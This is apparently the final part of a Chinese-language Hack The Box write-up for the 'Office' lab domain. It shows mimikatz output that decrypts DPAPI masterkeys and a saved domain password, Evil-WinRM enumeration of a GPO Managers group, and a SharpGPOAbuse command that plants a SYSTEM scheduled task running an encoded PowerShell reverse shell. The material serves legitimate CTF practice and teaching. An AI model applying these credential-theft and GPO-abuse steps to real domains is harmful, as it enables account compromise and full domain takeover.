    algHash          : 00008009 - 32777 (CALG_HMAC)
    algCrypt         : 00006603 - 26115 (CALG_3DES)
    pbKey            : 1107e1ab3e107528a73a2dafc0a2db28de1ea0a07e92cff03a935635013435d75e41797f612903d6eea41a8fc4f7ebe8d2fbecb0c74cdebb1e7df3c692682a066faa3edf107792d116584625cc97f0094384a5be811e9d5ce84e5f032704330609171c973008d84f

[backupkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : a2741b13d7261697be4241ebbe05098a
    rounds           : 00004650 - 18000
    algHash          : 00008009 - 32777 (CALG_HMAC)
    algCrypt         : 00006603 - 26115 (CALG_3DES)
    pbKey            : 21bf24763fbb1400010c08fccc5423fe7da8190c61d3006f2d5efd5ea586f463116805692bae637b2ab548828b3afb9313edc715edd11dc21143f4ce91f4f67afe987005320d3209

[domainkey]
  **DOMAINKEY**
    dwVersion        : 00000002 - 2
    dwSecretLen      : 00000100 - 256
    dwAccesscheckLen : 00000058 - 88
    guidMasterKey    : {e523832a-e126-4d6e-ac04-ed10da72b32f}
    pbSecret         : 159613bdc2d90dd4834a37e29873ce04c74722a706d0ba4770865039b3520ff46cf9c9281542665df2e72db48f67e16e2014e07b88f8b2f7d376a8b9d47041768d650c20661aee31dc340aead98b7600662d2dc320b4f89cf7384c2a47809c024adf0694048c38d6e1e3e10e8bd7baa7a6f1214cd3a029f8372225b2df9754c19e2ae4bc5ff4b85755b4c2dfc89add9f73c54ac45a221e5a72d3efe491aa6da8fb0104a983be20af3280ae68783e8648df413d082fa7d25506e9e6de1aadbf9cf93ec8dfc5fab4bfe1dd1492dbb679b1fa25c3f15fb8500c6021f518c74e42cd4b5d5d6e1057f912db5479ebda56892f346b4e9bf6404906c7cd65a54eea2842
    pbAccesscheck    : 1430b9a3c4ab2e9d5f61dd6c62aab8e1742338623f08461fe991cccd5b3e4621d4c8e322650460181967c409c20efcf02e8936c007f7a506566d66ba57448aa8c3524f0b9cf881afcbb80c9d8c341026f3d45382f63f8665


Auto SID from path seems to be: S-1-5-21-1199398058-4196589450-691661856-1107

[backupkey] without DPAPI_SYSTEM: 
d  key : 4d1b2c18baba7442e79d33cc771bf54027ae2500e08da3ecfccf91303bd471b6
  sha1: eeb787c4259e3c8b8408201ee5e54fc29fad22b2

[domainkey] with RPC
[DC] 'office.htb' will be the domain
[DC] 'DC.office.htb' will be the DC server
  key : 87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
  sha1: 85285eb368befb1670633b05ce58ca4d75c73c77

CREDENTIALS cache
=================

MASTERKEYS cache
================
GUID:{191d3f9d-7959-4b4d-a520-a444853c47eb};KeyHash:85285eb368befb1670633b05ce58ca4d75c73c77;Key:available

DOMAINKEYS cache
================

mimikatz # dpapi::masterkey /in:"C:\Users\PPotts\AppData\Roaming\microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\10811601-0fa9-43c2-97e5-9bef8471fc7d" /rpc
**MASTERKEYS**
  dwVersion          : 00000002 - 2
  szGuid             : {10811601-0fa9-43c2-97e5-9bef8471fc7d}
  dwFlags            : 00000000 - 0
  dwMasterKeyLen     : 00000088 - 136
  dwBackupKeyLen     : 00000068 - 104
  dwCredHistLen      : 00000000 - 0
  dwDomainKeyLen     : 00000174 - 372
[masterkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : 8bc9f4a7b9094394e57e92daedeafcb9
    rounds           : 00004650 - 18000
    algHash          : 00008009 - 32777 (CALG_HMAC)
    algCrypt         : 00006603 - 26115 (CALG_3DES)
    pbKey            : f97146093504382ec842cd2eec5f2bbfbbdd83ab6c4e44ada82d5ae23d1a05422fe6d1378165d4434bf41737616acf823e86c69424271d0f72684018a0928045ef77b719003b352644398f4286795b1297bee821deec898cb167aa76d984808014aa0d22136688c3

[backupkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : 26773bc8263172355939bdb9cb33e2f9
    rounds           : 00004650 - 18000
    algHash          : 00008009 - 32777 (CALG_HMAC)
    algCrypt         : 00006603 - 26115 (CALG_3DES)
    pbKey            : 540c745f74ac62c43d245e850eb9952d6daf6a803163b94683eb82a30bf3d20d8e72d4e1003e0f17ca2575722c009e1855333ddacb7f08702369b0035aff50163eee5d2f2384fe28

[domainkey]
  **DOMAINKEY**
    dwVersion        : 00000002 - 2
    dwSecretLen      : 00000100 - 256
    dwAccesscheckLen : 00000058 - 88
    guidMasterKey    : {e523832a-e126-4d6e-ac04-ed10da72b32f}
    pbSecret         : dda74feddaea0b4119723acb88bb3aa033b85d6fd6451d04d0afa95d00c640d33d83f0894c5c62fd6298327c40773512ccad8961131005b450732f72bc3ece29defa2088def5dce8f64ff76641057d473ad0073688c39c491286461b57a38eddbde92f213811ba2ec0f7867cd377df0b860584e3fc082529e7adaa437ebb3ac8c39a567df96bf21ce21bfb7c687b613b678a8be14f1fc6e96c9a16a18c156bc0255e514cfd61eb4d81fa08060c6cd35d330f5a0121ca7126ba667ccb1fbb2f93857f8230e20606b7b69d558b9462012db6e6418acd86d1b9a671d94ff92e5fd3684b099f5a29165a3410ddb9e924b4b31f22428895f37815badf7ec30fe80884
    pbAccesscheck    : a98be73386a3dca744e20b13b967e3bc4a1f58bf9be981bf84cf2e2c4daab8ca4def27d6e22540e7eebadd6c122ed75a1b991532d88794e2e999673385241275fe2735bbbb46f9e88dbd799589b42d572ca6b14ecf279a6d


Auto SID from path seems to be: S-1-5-21-1199398058-4196589450-691661856-1107

[backupkey] without DPAPI_SYSTEM: 
  key : 2c19b1b2f1784e79edaed52a319cc5b4ad42179d4906fd084aef8e6e6dd9b8db
  sha1: 4961d54be229fd871debd903b3d518ea4d362c42

[domainkey] with RPC
[DC] 'office.htb' will be the domain
[DC] 'DC.office.htb' will be the DC server
  key : 3f891c81971ccacb02123a9dde170eaae918026ccc0a305b221d3582de4add84c900ae79f950132e4a70b0ef49dea6907b4f319c5dd10f60cc31cb1e3bc33024
  sha1: fbab11cacdd8407e8db9604f0f8c92178bee6fd3

  mimikatz # dpapi::cache

CREDENTIALS cache
=================

MASTERKEYS cache
================
GUID:{191d3f9d-7959-4b4d-a520-a444853c47eb};KeyHash:85285eb368befb1670633b05ce58ca4d75c73c77;Key:available
GUID:{10811601-0fa9-43c2-97e5-9bef8471fc7d};KeyHash:fbab11cacdd8407e8db9604f0f8c92178bee6fd3;Key:available

DOMAINKEYS cache

4.可以看到两个master的key都缓存下来了,接下来拿来解密cred就行(这里为了控制篇幅,跳过了没用的密码缓存)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
mimikatz # dpapi::cred /in:"C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4"
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {191d3f9d-7959-4b4d-a520-a444853c47eb}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data

  algCrypt           : 00006603 - 26115 (CALG_3DES)
  dwAlgCryptLen      : 000000c0 - 192
  dwSaltLen          : 00000010 - 16
  pbSalt             : 649c4466d5d647dd2c595f4e43fb7e1d
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         : 
  algHash            : 00008004 - 32772 (CALG_SHA1)
  dwAlgHashLen       : 000000a0 - 160
  dwHmac2KeyLen      : 00000010 - 16
  pbHmack2Key        : 32e88dfd1927fdef0ede5abf2c024e3a
  dwDataLen          : 000000c0 - 192
  pbData             : f73b168ecbad599e5ca202cf9ff719ace31cc92423a28aff5838d7063de5cccd4ca86bfb2950391284b26a34b0eff2dbc9799bdd726df9fad9cb284bacd7f1ccbba0fe140ac16264896a810e80cac3b68f82c80347c4deaf682c2f4d3be1de025f0a68988fa9d633de943f7b809f35a141149ac748bb415990fb6ea95ef49bd561eb39358d1092aef3bbcc7d5f5f20bab8d3e395350c711d39dbe7c29d49a5328975aa6fd5267b39cf22ed1f9b933e2b8145d66a5a370dcf76de2acdf549fc97
  dwSignLen          : 00000014 - 20
  pbSign             : 21bfb22ca38e0a802e38065458cecef00b450976

Decrypting Credential:
 * volatile cache: GUID:{191d3f9d-7959-4b4d-a520-a444853c47eb};KeyHash:85285eb368befb1670633b05ce58ca4d75c73c77;Key:available
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000be - 190
  credUnk0       : 00000000 - 0

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 5/9/2023 11:03:21 PM
  unkFlagsOrSize : 00000018 - 24
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:interactive=OFFICE\HHogan
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : OFFICE\HHogan
  CredentialBlob : H4ppyFtW183#
  Attributes     : 0

于是拿到了password

winrm登录hhogan做最后的root部分

首先如果事先有放过狗或者查看过权限组的情况下应该会发现hhogan是有三组权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
*Evil-WinRM* PS C:\Users\HHogan\Documents> net user hhogan
User name                    HHogan
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/6/2023 10:59:34 AM
Password expires             Never
Password changeable          5/7/2023 10:59:34 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/10/2023 4:30:58 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users         *GPO Managers
The command completed successfully.

*Evil-WinRM* PS C:\Users\HHogan\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                           Attributes
=========================================== ================ ============================================= ==================================================
Everyone                                    Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
**OFFICE\GPO Managers**    《------注意        Group            S-1-5-21-1199398058-4196589450-691661856-1117 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

其中我们最应该关注的是GPO Managers,首先这个组他是一个自定义组,并不在域标准组内。

其次他的GPO managers单从字面上来看所代表的是域内的组策略管理者

所以,我们可以通过这GPO,也就是委派组策略来实现提权或者,以特定权限执行命令等等,组策略对象范畴内操作。

这里我利用的方式是SharpGPOAbuse.exe,当然这个有个不算缺点的缺点,就是需要有一个新建的,或是我们可修改的gpo对象,来被这个工具运行时候利用。

所以我们要先找出可修改的对象(我有点懒不想新建..所以不知道新建行不行的通)

首先导入一下. .\PowerView.ps1

然后利用命令来寻找我们可控的gpo对象

Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq ((Get-DomainGroup "GPO managers" | select objectSid).objectSid)}

这边我找到了两个能用的 于是看一下具体的信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
*Evil-WinRM* PS C:\Users\HHogan\Documents> Get-DomainGPO '{31B2F340-016D-11D2-945F-00C04FB984F9}'


usncreated               : 5672
systemflags              : -1946157056
displayname              : Default Domain Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00
                           C04FB94F17}]
whenchanged              : 5/10/2023 5:30:07 PM
objectclass              : {top, container, groupPolicyContainer}
gpcfunctionalityversion  : 2
showinadvancedviewonly   : True
usnchanged               : 57836
dscorepropagationdata    : {5/10/2023 5:30:07 PM, 4/14/2023 10:14:59 PM, 1/1/1601 12:00:00 AM}
name                     : {31B2F340-016D-11D2-945F-00C04FB984F9}
flags                    : 0
cn                       : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject   : True
gpcfilesyspath           : \\office.htb\sysvol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname        : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=office,DC=htb
whencreated              : 4/14/2023 10:13:57 PM
versionnumber            : 18
instancetype             : 4
objectguid               : 61e3527f-81bf-456a-b79c-f9a86e8127d0
objectcategory           : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=office,DC=htb

=====================================================================================================================

*Evil-WinRM* PS C:\Users\HHogan\Documents> Get-DomainGPO '{6AC1786C-016F-11D2-945F-00C04fB984F9}'


usncreated               : 5675
systemflags              : -1946157056
displayname              : Default Domain Controllers Policy
gpcmachineextensionnames : [{00000000-0000-0000-0000-000000000000}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED
                           4A4D1AFC72}]
whenchanged              : 1/25/2024 10:40:03 PM
objectclass              : {top, container, groupPolicyContainer}
gpcfunctionalityversion  : 2
showinadvancedviewonly   : True
usnchanged               : 213141
dscorepropagationdata    : {5/10/2023 5:29:54 PM, 4/14/2023 10:14:59 PM, 1/1/1601 12:00:00 AM}
name                     : {6AC1786C-016F-11D2-945F-00C04fB984F9}
flags                    : 0
cn                       : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject   : True
gpcfilesyspath           : \\office.htb\sysvol\office.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
distinguishedname        : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=office,DC=htb
whencreated              : 4/14/2023 10:13:57 PM
versionnumber            : 12
instancetype             : 4
objectguid               : 021296bc-8f0e-4902-89e8-6e566d72c108
objectcategory           : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=office,DC=htb

需要留意的是displayname下面修改利用gpo会用到

接下来利用SharpGPOAbuse修改Default Domain Policy(二选一,我选了Default Domain Policy)下发一个任务,这边我用的ps弹shell

1
SharpGPOAbuse.exe --AddComputerTask --TaskName “test1” --Author NT AUTHORITY\SYSTEM --COMMAND “powershell.exe” --Arguments “-enc {base64_shell_code}” --GPOName “Default Domain Policy”

get root